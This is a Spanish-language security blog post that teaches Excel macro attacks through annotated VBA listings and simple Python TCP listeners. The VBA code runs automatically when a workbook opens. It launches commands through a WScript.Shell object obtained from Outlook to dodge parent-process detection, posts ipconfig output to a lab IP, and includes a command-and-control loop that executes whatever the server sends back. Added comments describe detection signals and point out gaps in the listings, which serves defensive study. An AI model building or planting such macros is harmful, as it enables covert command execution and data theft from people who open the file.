Hackers VULNERAN SEGURIDAD con MACROS de EXCEL | Seguridad Informática
Publicado: 26 Abr 2021, 23:24
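Muchos ataques comienzan con un simple documento que ejecuta código malicioso. Los atacantes astutos pueden incluso personalizar la carga útil para eludir los controles de los terminales. Aquí te mostramos un código en Visual Basic y otro en Python (este último en Kali Linux) que permiten que los ataques no sean detectados por los firewalls ni los antivirus. Que eso ocurra depende de la configuración de cada equipo: el bloqueo de macros en archivos descargados de Internet, el análisis de macros mediante AMSI y las reglas que impiden a las aplicaciones de Office crear procesos hijo están pensados precisamente para este patrón.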

LABORATORIO de Prueba o Escenario de Trabajo

CODIGOS VISUAL BASIC Para Macros de Paquetes de Microsoft Office
Basicos
CODIGO de Programación USADO EN EL VIDEO
CODIGO ENCRIPTADO
CODIGOS en PYTHON | Socket Servidores Listeners
VIDEO TUTORIAL
Links de Interes
https://realpython.com/python-sockets/#tcp-sockets
https://rico-schmidt.name/pymotw-3/socket/tcp.html

LABORATORIO de Prueba o Escenario de Trabajo

CODIGOS VISUAL BASIC Para Macros de Paquetes de Microsoft Office
Basicos
Código: Seleccionar todo
' Show a fixed greeting in a message box. Takes no arguments; the name is not
' an event-handler name, so nothing in this listing runs it automatically.
Sub macro()
Dim saludo As String
saludo = "Hola manga de Culiados"
MsgBox saludo
End Sub
Código: Seleccionar todo
' Show a fixed greeting in a message box. The Sub carries the workbook-open
' event name, so it is meant to run by itself when the file is opened with
' macros enabled.
' NOTE(review): assumes the code is placed in the ThisWorkbook module - confirm.
Sub WorkBook_Open()
Dim saludo As String
saludo = "Hola manga de Culiados"
Call MsgBox(saludo)
End Sub
Código: Seleccionar todo
' Open-event demo: start the external program "Whoami" through WScript.Shell
' and show what it printed.
' NOTE(review): assumes the code is placed in the ThisWorkbook module so the
' open event reaches it - confirm.
' Defender view: a spreadsheet process that creates a WScript.Shell object and
' spawns a console program on open is a process-creation detection signal;
' blocking macros in files from the Internet stops this before it runs.
Sub WorkBook_Open()
' Create the Windows Script Host shell COM object.
Set WshShell = CreateObject ("WScript.Shell")
' Launch "Whoami" and keep the object that represents the running process.
Set WshShellExec = WshShell.Exec ("Whoami")
' Read everything the process wrote to standard output and display it.
MsgBox (WshShellExec.StdOut.ReadAll)
End Sub
Código: Seleccionar todo
' Open-event demo that obtains WScript.Shell through an Outlook.Application
' COM object instead of creating it directly, then starts two processes.
' NOTE(review): presumably this makes the launched processes children of
' OUTLOOK.EXE rather than EXCEL.EXE - confirm in process-creation logs. Parent
' process rules that only watch Excel or Word would need to cover Outlook too.
Sub WorkBook_Open()
' Get (or start) Outlook's automation object.
Set objOL = CreateObject ("Outlook.Application")
' Ask Outlook, not Excel, to create the Windows Script Host shell object.
Set WshShell = objOL.CreateObject ("WScript.Shell")
Set WshShellExec = WshShell.Exec ("Whoami")
' The variable is reassigned here, so the "Whoami" output above is never read.
Set WshShellExec = WshShell.Exec ("powershell -c sleep 5000")
' Displays the standard output of the PowerShell process, not of "Whoami".
' NOTE(review): the long sleep looks like a way to keep the child process alive
' for inspection in a process viewer - confirm against the video.
MsgBox (WshShellExec.StdOut.ReadAll)
End Sub
Código: Seleccionar todo
' Run `command` through a WScript.Shell object obtained from Outlook and return
' everything the process wrote to standard output. Returns the literal string
' "Error" if any step raises a runtime error.
' Defender view: the argument is executed as given, with no allow-list or
' validation, so every caller of this function is a command-execution point.
' NOTE(review): going through Outlook.Application presumably changes the parent
' of the spawned process to OUTLOOK.EXE - confirm in process-creation logs.
Function RunCommand(command As String) As String
' Any runtime error below jumps to the error: label.
On Error GoTo error
Set objOL = CreateObject("Outlook.Application")
Set WshShell = objOL.CreateObject("Wscript.Shell")
Set WshShellExec = WshShell.Exec(command)
' The function's return value is the process's complete standard output.
RunCommand = WshShellExec.StdOut.ReadAll
' Normal path: fall through the Done: label and leave before the handler.
Done:
Exit Function
error:
RunCommand = "Error"
End Function
' POST `data` as the request body to a hard-coded HTTP endpoint. Returns
' nothing; on any runtime error it shows "Cannot connect to Server".
' Defender view: this is an outbound plain-HTTP POST made from an Office macro
' to a fixed IP and port, with a fixed User-Agent that names Internet
' Explorer 6 on Windows NT 5.0. The destination, the cleartext body and the
' outdated User-Agent are each usable attributes for proxy or network rules.
' 192.168.1.183 is a private (RFC 1918) address, consistent with the lab
' scenario the page describes.
Function SendToServer(data As String)
On Error GoTo error
' Server-side XMLHTTP COM client.
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
Url = "http://192.168.1.183:5000"
' Third argument False makes the request synchronous: send blocks until done.
objHTTP.Open "POST", Url, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send (data)
' Normal path: fall through the Done: label and leave before the handler.
Done:
Exit Function
error:
MsgBox ("Cannot connect to Server")
End Function
' Open-event entry point: collect the output of "ipconfig", show it in a
' message box, then POST it with SendToServer.
' Defender view: host network configuration leaves the machine as soon as the
' workbook is opened with macros enabled; the sequence to look for is an Office
' process spawning ipconfig followed by an outbound HTTP POST.
Sub WorkBook_Open()
' Both variables are declared but never used in this Sub.
Dim strData As String
Dim strCommand As String
' strOutput is not declared in this listing (implicit variable).
strOutput = RunCommand("ipconfig")
MsgBox (strOutput)
SendToServer (strOutput)
End Sub
Código: Seleccionar todo
' Run `command` through a WScript.Shell object obtained from Outlook and return
' everything the process wrote to standard output. Returns the literal string
' "Error" if any step raises a runtime error.
' Defender view: the argument is executed as given, with no allow-list or
' validation; in this listing the caller passes in text received from a server.
' NOTE(review): going through Outlook.Application presumably changes the parent
' of the spawned process to OUTLOOK.EXE - confirm in process-creation logs.
Function RunCommand(command As String) As String
' Any runtime error below jumps to the error: label.
On Error GoTo error
Set objOL = CreateObject("Outlook.Application")
Set WshShell = objOL.CreateObject("Wscript.Shell")
Set WshShellExec = WshShell.Exec(command)
' The function's return value is the process's complete standard output.
RunCommand = WshShellExec.StdOut.ReadAll
' Normal path: fall through the Done: label and leave before the handler.
Done:
Exit Function
error:
RunCommand = "Error"
End Function
' Polling loop: POST `data` to the hard-coded endpoint, take the reply as the
' next command, run it with RunCommand, and send that output on the next
' iteration. The first body sent is the literal "START".
' NOTE(review): the listing is incomplete as published - the Do While
' condition has no right-hand operand - so the stop condition cannot be
' determined from this page.
' Defender view: whatever the server returns is executed on the host without
' validation, i.e. remote command execution driven over plain HTTP. Repeated
' synchronous POSTs from an Office process to one fixed host, with the fixed
' Internet Explorer 6 User-Agent, are the network-side signal.
Function StartC2()
Dim replyTXT as String
' Any runtime error below jumps to the error: label.
On Error GoTo error
data = "START"
Do While replyTXT <>
' A new HTTP client object is created on every iteration.
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
Url = "http://192.168.1.183:5000"
' Third argument False makes the request synchronous.
objHTTP.Open "POST", Url, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send (data)
' Reads the reply from the request object (identifier kept as published).
replyTXT =objHTTP.reponseText
' The reply is handed to RunCommand as the command line to execute.
data = RunCommand (replyTXT)
Loop
Done:
Exit Function
error:
MsgBox ("Cannot connect to Server")
End Function
' Open-event entry point: collect the output of "ipconfig", show it, pass it to
' SendToServerEnc, then enter the StartC2 polling loop.
' NOTE(review): SendToServerEnc is not defined in any listing on this page; the
' page index mentions an "encrypted" code section that is not shown here.
Sub WorkBook_Open()
' Both variables are declared but never used in this Sub.
Dim strData As String
Dim strCommand As String
' strOutput is not declared in this listing (implicit variable).
strOutput = RunCommand("ipconfig")
MsgBox (strOutput)
SendToServerEnc (strOutput)
StartC2
End Sub
Código: Seleccionar todo
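import socket
import sys

# Single-shot TCP receiver for the lab: accept one client, print the first
# chunk it sends, answer with a fixed greeting, then exit.
# The address must be one configured on this machine, otherwise bind() fails.
LISTEN_ADDRESS = ('192.168.1.183', 8000)

# The with-blocks close both sockets even if a call in between raises.
with socket.socket() as mi_socket:
    mi_socket.bind(LISTEN_ADDRESS)
    mi_socket.listen(100)
    conexion, addr = mi_socket.accept()
    with conexion:
        print("nueva conexion Establecida")
        print(addr)
        # One recv() returns at most 4096 bytes and may hold only part of what
        # the peer sent; this demo prints that first chunk and nothing more.
        peticion = conexion.recv(4096)
        print(peticion)
        # Sockets carry bytes on Python 3, so the reply is a bytes literal.
        conexion.sendall(b"hola te saludo desde el servidor")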
Código: Seleccionar todo
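import socket
import sys

# TCP receiver that handles clients one after another: it prints the first
# chunk each client sends and stops after a client that sends nothing.
# NOTE: the published listing lost its indentation; here every connection is
# closed right after its single read, which avoids leaking one socket per
# client.
server_address = ('192.168.1.183', 8000)

with socket.socket() as mi_socket:
    mi_socket.bind(server_address)
    mi_socket.listen(100)
    print('starting up on {} port {}'.format(*server_address))
    print('waiting for a connection')
    while True:
        conexion, addr = mi_socket.accept()
        with conexion:
            print("nueva conexion Establecida")
            print(addr)
            # A single recv() may return only part of the peer's message.
            peticion = conexion.recv(16384)
            print(peticion)
        # An empty read means the peer closed without sending data.
        if not peticion:
            break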
Código: Seleccionar todo
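import socket
import sys

# TCP receiver that serves clients one at a time and prints every chunk a
# client sends until that client closes the connection. Nothing is sent back.
server_address = ('192.168.1.183', 8000)

# Create a TCP/IP socket; the with-block closes it when the script stops.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    print('starting up on {} port {}'.format(*server_address))
    sock.bind(server_address)
    # Listen for incoming connections
    sock.listen(100)
    while True:
        # Wait for a connection
        print('waiting for a connection')
        connection, client_address = sock.accept()
        # Leaving the with-block closes the connection, also on errors.
        with connection:
            print('connection from', client_address)
            # Receive the data in chunks of at most 4096 bytes. The published
            # listing printed each chunk twice; it is printed once here.
            while True:
                data = connection.recv(4096)
                if not data:
                    print('no data from', client_address)
                    break
                print(data)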
Código: Seleccionar todo
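import socket
import sys

__author__ = 'uva'

# Synchronous TCP server: serves one client at a time and answers every chunk
# it receives with the same bytes in upper case.

# For tcp; the with-block closes the listening socket when the script stops.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    # To fix the address already in use issue
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Bind to one specific address on port 8080. The published comment said
    # "all the interfaces", which the call does not do.
    sock.bind(("192.168.1.183", 8080))
    # Number of backlog clients
    sock.listen(100)
    print("Waiting for client....!")
    try:
        while True:
            client, (ip, port) = sock.accept()
            with client:
                print('client connected with ip as {} and port {}'.format(ip, port))
                data = client.recv(2048)
                # An empty read means the client closed the connection.
                while data:
                    print(len(data))
                    print("Client sent the data : {}".format(data))
                    # sendall() keeps writing until the whole reply is sent.
                    client.sendall(data.upper())
                    data = client.recv(2048)
                print("Client closed connection !!! :( ")
    except KeyboardInterrupt:
        # The loop never ends by itself; Ctrl+C is the way to reach the
        # shutdown message, which the published listing could never print.
        pass
    print("Closing the Socket!!")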
Links de Interes
https://realpython.com/python-sockets/#tcp-sockets
https://rico-schmidt.name/pymotw-3/socket/tcp.html